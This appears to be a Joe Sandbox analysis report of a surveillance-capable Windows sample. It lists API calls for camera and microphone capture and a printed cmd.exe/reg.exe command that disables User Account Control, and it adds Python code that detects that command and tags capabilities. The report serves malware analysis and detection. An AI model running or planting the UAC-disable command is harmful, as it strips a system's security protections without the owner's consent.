                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: h G
                                • API String ID: 1958988193-3300504347
                                • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041B310
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                • GetLastError.KERNEL32 ref: 0041B335
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                  • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                • _UnwindNestedFrames.LIBCMT ref: 00437631
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID: /zC
                                • API String ID: 2633735394-4132788633
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID: ]tA
                                • API String ID: 4116985748-3517819141
                                • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
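The CreateProcessA call in the entry above spawns cmd.exe /k with a reg.exe command that writes EnableLUA = 0 under the UAC policy key, which turns User Account Control off at the next logon. The following detection logic is an added example written for this report (it is not Joe Sandbox or sample code): it tokenizes a process command line, locates a `reg add` even when it is wrapped in cmd.exe /k or /c, and fires only on EnableLUA being set to zero under that exact key. The process-creation records are constructed to resemble Sysmon event ID 1 / EDR fields and are not taken from the analysis run; the environment-variable expansions and hive aliases are this example's own fixed assumptions.

```python
"""
Detection of the UAC-disable command built by the sample at 0040E547:
  cmd.exe /k %windir%\System32\reg.exe ADD HKLM\...\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Added example for this report, not Joe Sandbox or sample code. The event
records below are constructed (Sysmon event ID 1 style fields), not taken
from the analysis run.
"""
import re
from typing import Dict, Iterable, List, Optional

# Registry value that disables UAC (effective at next logon) when set to 0.
UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUE = "EnableLUA"

# Long hive name -> short form (assumption: only the hive this rule cares about).
HIVE_ALIASES = {"HKEY_LOCAL_MACHINE": "HKLM"}

# Fixed %VAR% expansions so the check does not depend on the analyst's machine.
ENV_DEFAULTS = {"windir": r"C:\Windows", "systemroot": r"C:\Windows"}

# A quoted token (keeps spaces inside quotes) or a run of non-space characters.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def normalize_cmdline(cmdline: str) -> str:
    """Expand %VAR% references and long hive names so textual variants of
    the same command tokenize identically."""
    def expand(m):
        return ENV_DEFAULTS.get(m.group(1).lower(), m.group(0))
    s = re.sub(r"%([^%\s]+)%", expand, cmdline)
    for long_name, short in HIVE_ALIASES.items():
        s = re.sub(re.escape(long_name), short, s, flags=re.IGNORECASE)
    return s


def parse_reg_add(cmdline: str) -> Optional[Dict[str, Optional[str]]]:
    """Return {key, value, type, data} for the first `reg add` found anywhere
    in the command line (a cmd.exe /k or /c wrapper does not hide it), or
    None when the command line contains no reg add."""
    toks = [t.strip('"') for t in TOKEN_RE.findall(normalize_cmdline(cmdline))]
    for i, tok in enumerate(toks):
        exe = tok.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if exe in ("reg", "reg.exe") and i + 2 < len(toks) and toks[i + 1].lower() == "add":
            rest = toks[i + 2:]
            parsed: Dict[str, Optional[str]] = {"key": rest[0], "value": None, "type": None, "data": None}
            j = 1
            while j + 1 < len(rest):
                field = {"/v": "value", "/t": "type", "/d": "data"}.get(rest[j].lower())
                if field:
                    parsed[field] = rest[j + 1]
                    j += 2
                else:
                    j += 1
            return parsed
    return None


def is_uac_disable(cmdline: str) -> bool:
    """True when the command writes EnableLUA = 0 under the UAC policy key."""
    r = parse_reg_add(cmdline)
    if r is None:
        return False
    key_ok = r["key"].rstrip("\\").lower() == UAC_KEY.lower()
    value_ok = (r["value"] or "").lower() == UAC_VALUE.lower()
    try:
        data_zero = int(r["data"] or "", 0) == 0   # accepts 0, 00, 0x0
    except ValueError:
        data_zero = False
    return key_ok and value_ok and data_zero


def scan_events(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the process-creation events whose command line disables UAC."""
    return [e for e in events if is_uac_disable(str(e.get("CommandLine", "")))]


# Constructed records; event 1 carries the exact command line from the report.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"Id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    # Same effect: long hive name, quoted key, hex zero, no cmd.exe wrapper.
    {"Id": 2, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0x0 /f'},
    # Re-enables UAC; must not fire.
    {"Id": 3, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    # Unrelated key with a zero value; must not fire.
    {"Id": 4, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe ADD HKCU\Software\Example\App /v Telemetry /t REG_DWORD /d 0 /f"},
]

if __name__ == "__main__":
    for e in scan_events(SAMPLE_EVENTS):
        print(f"UAC disable via reg.exe: event {e['Id']}: {e['CommandLine']}")
```

reg.exe is only one way to write this value; a PowerShell Set-ItemProperty or a direct RegSetValueEx call produces no such command line, so pair this rule with a registry-value-set event (Sysmon event ID 13) on the same key and value.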
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                                • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                                • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                • Connection KeepAlive | Disabled, xrefs: 004050D9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: Connection KeepAlive | Disabled
                                • API String ID: 2993684571-3818284553
                                • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                APIs
                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: GetCursorInfo$User32.dll$`Mw
                                • API String ID: 1646373207-2986171508
                                • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                APIs
                                • Sleep.KERNEL32(00000000,?), ref: 004044A4
                                  • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                • API String ID: 3469354165-3547787478
                                • Opcode ID: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
                                • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                • Opcode Fuzzy Hash: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
                                • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                APIs
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • _free.LIBCMT ref: 00442318
                                • _free.LIBCMT ref: 0044232F
                                • _free.LIBCMT ref: 0044234E
                                • _free.LIBCMT ref: 00442369
                                • _free.LIBCMT ref: 00442380
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                • _free.LIBCMT ref: 004468EC
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00446AB8
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                • __alloca_probe_16.LIBCMT ref: 0044E391
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                • __freea.LIBCMT ref: 0044E3FD
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
                                • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                • waveInStart.WINMM ref: 00401CDE
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID:
                                • API String ID: 1356121797-0
                                • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                                • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
                                • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
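The waveInOpen / waveInPrepareHeader / waveInAddBuffer / waveInStart sequence in the entry above is microphone capture; earlier entries show the same listing format for service control (ControlService with control code 3), the four GetSystemMetrics calls with indices 0x4C to 0x4F, the cmd.exe/reg.exe launch, and GetModuleHandleA/GetProcAddress resolution of GetCursorInfo. The parser and capability tagger below is an added example for this report, not Joe Sandbox or sample code: it reads lines in the "APIs" listing format, splits them into API, module, arguments, ref address and subcall parent, and maps the calls to coarse capability tags. The input lines are copied from the function entries above; the tag names and the two constant tables are this example's own assumptions (the constants are the Win32 SDK values). Argument positions in these listings are a stack snapshot and can be off, so decoded constants are hints for triage, not proof.

```python
"""
Parser and capability tagger for the "APIs" listings in a Joe Sandbox
function entry. Added example for this report, not Joe Sandbox or sample code.
Sample input lines are copied from this report; tag names and constant tables
are this example's assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One listing line after the leading bullet is removed:
#   [Part of subcall function ADDR: ]Api.MODULE[(arg,arg,...)][,] ref: ADDR
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@:~]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# GetSystemMetrics indices describing the virtual (all monitors) desktop,
# the values a screenshot routine needs to size its bitmap.
SM_VIRTUAL_SCREEN = {0x4C: "SM_XVIRTUALSCREEN", 0x4D: "SM_YVIRTUALSCREEN",
                     0x4E: "SM_CXVIRTUALSCREEN", 0x4F: "SM_CYVIRTUALSCREEN"}
# ControlService dwControl codes.
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None   # parent function when listed as a subcall


def hexint(s: str) -> Optional[int]:
    """Stack slots are printed as hex digits, '?' when unknown, or a symbol
    such as Function_00001CEB; only the hex form decodes to a number."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_line(line: str) -> Optional[ApiCall]:
    text = line.strip().lstrip("•").strip()
    m = LINE_RE.match(text)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub"))


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c is not None]


def tag_call(c: ApiCall) -> List[str]:
    """Map one call to capability tags (assumed names, best-effort decoding)."""
    tags: List[str] = []
    if c.api.startswith("waveIn"):
        tags.append("audio-capture")
    if c.api == "GetSystemMetrics" and c.args:
        name = SM_VIRTUAL_SCREEN.get(hexint(c.args[0]))
        if name:
            tags.append("screen-geometry:" + name)
    if c.api.startswith("CreateProcess") and any(
            "EnableLUA" in a and re.search(r"/d\s+0\b", a) for a in c.args):
        tags.append("uac-disable")
    if c.api == "GetProcAddress" or c.api.startswith("GetModuleHandle"):
        tags.append("dynamic-api-resolution")
    if c.api == "ControlService" and len(c.args) > 1:
        name = SERVICE_CONTROL.get(hexint(c.args[1]))
        tags.append("service-control:" + (name or c.args[1]))
    return tags


def summarize(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """tag -> ["Api@ref", ...] in listing order, for a quick triage view."""
    out: Dict[str, List[str]] = {}
    for c in calls:
        for t in tag_call(c):
            out.setdefault(t, []).append(f"{c.api}@{c.ref}")
    return out


# Lines copied from the function entries in this report.
SAMPLE_LISTING = r"""
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
• GetSystemMetrics.USER32(0000004C), ref: 004173AA
• GetSystemMetrics.USER32(0000004F), ref: 004173BC
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
• GetProcAddress.KERNEL32(00000000), ref: 00401403
• waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
• waveInStart.WINMM ref: 00401CDE
• _free.LIBCMT ref: 00442318
  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
"""

if __name__ == "__main__":
    for tag, where in summarize(parse_listing(SAMPLE_LISTING)).items():
        print(f"{tag}: {', '.join(where)}")
```

The split on commas is safe for these lines because no argument contains a comma; a string argument that does would need a quote-aware split before the tagger is trusted on it.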
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                • _free.LIBCMT ref: 0044C59F
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
